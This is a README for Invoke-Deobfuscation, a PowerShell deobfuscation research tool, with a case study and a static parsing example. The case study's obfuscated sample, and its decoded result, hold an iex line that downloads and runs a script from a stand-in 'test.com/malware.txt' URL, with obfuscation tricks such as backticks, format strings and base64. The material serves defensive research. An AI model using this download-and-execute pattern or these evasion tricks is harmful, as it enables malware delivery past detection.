Environment
How to use it?
git clone https://gitee.com/snowroll/invoke-deobfuscation
cd invoke-deobfuscation/Code
pwsh # Linux or MacOS
Import-Module ./Invoke-DeObfuscation.psd1
DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
Case Study
demo.ps1
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
.($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
Result
Write-Host hello
$var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$var2 = 'https://test.com/malware.txt'
.('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
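The recovery shown in the case study can be reproduced statically with PowerShell's own parser. The following is an added example, not code from Invoke-Deobfuscation or its authors: it parses the first four lines of demo.ps1 (embedded as a constructed sample) and folds only constant expressions, so nothing in the sample is executed. The helper name Resolve-Const, the single-assignment assumption and the hard-coded UTF-16LE decoding are assumptions of this example.

```powershell
using namespace System.Management.Automation.Language
# Constructed input: the first four lines of demo.ps1 from the case study.
$sample = @'
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
'@
$tokens = $null; $errors = $null
$ast = [Parser]::ParseInput($sample, [ref]$tokens, [ref]$errors)   # parse only, never run

# Hypothetical helper: value of a constant string expression, or $null if it is not one.
function Resolve-Const($node, $consts) {
    if ($node -is [StringConstantExpressionAst]) { return $node.Value }
    if ($node -is [VariableExpressionAst]) { return $consts[$node.VariablePath.UserPath] }
    if ($node -is [BinaryExpressionAst] -and $node.Operator -eq [TokenKind]::Plus) {
        $l = Resolve-Const $node.Left $consts; $r = Resolve-Const $node.Right $consts
        if ($null -ne $l -and $null -ne $r) { return $l + $r }
    }
    return $null
}

# 1. Backticks: the parser has already unescaped bareword command names.
foreach ($c in $ast.FindAll({ param($n) $n -is [CommandAst] }, $true)) {
    if ($c.GetCommandName()) { '{0}  =>  {1}' -f $c.CommandElements[0].Extent.Text, $c.GetCommandName() }
}

# 2. Format operator: fold "-f" only when the format and every argument are string constants.
foreach ($b in $ast.FindAll({ param($n) $n -is [BinaryExpressionAst] -and $n.Operator -eq [TokenKind]::Format }, $true)) {
    $items = if ($b.Right -is [ArrayLiteralAst]) { @($b.Right.Elements) } else { @($b.Right) }
    $bad = @($items | Where-Object { $_ -isnot [StringConstantExpressionAst] })
    if ($b.Left -is [StringConstantExpressionAst] -and $bad.Count -eq 0) {
        '{0}  =>  {1}' -f $b.Extent.Text, ($b.Left.Value -f [object[]]@($items.Value))
    }
}

# 3. Base64: collect constant assignments (assumes each variable is assigned once), then decode.
$consts = @{}
foreach ($a in $ast.FindAll({ param($n) $n -is [AssignmentStatementAst] }, $true)) {
    if ($a.Left -is [VariableExpressionAst] -and $a.Right -is [CommandExpressionAst]) {
        $v = Resolve-Const $a.Right.Expression $consts
        if ($null -ne $v) { $consts[$a.Left.VariablePath.UserPath] = $v }
    }
}
foreach ($m in $ast.FindAll({ param($n) $n -is [InvokeMemberExpressionAst] -and $n.Member.Value -eq 'FromBase64String' }, $true)) {
    $b64 = Resolve-Const $m.Arguments[0] $consts
    # Assumption: UTF-16LE, because the sample wraps the call in [Text.Encoding]::Unicode.GetString.
    if ($b64) { '{0}  =>  {1}' -f $m.Extent.Text, ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))) }
}
```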
DataSet Request
If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
The full dataset is not public. If you would like to collaborate on research, please feel free to contact us.
Citation
@inproceedings{chai2022invoke,
title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts},
author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren},
booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)},
pages={295--306},
year={2022},
organization={IEEE}
}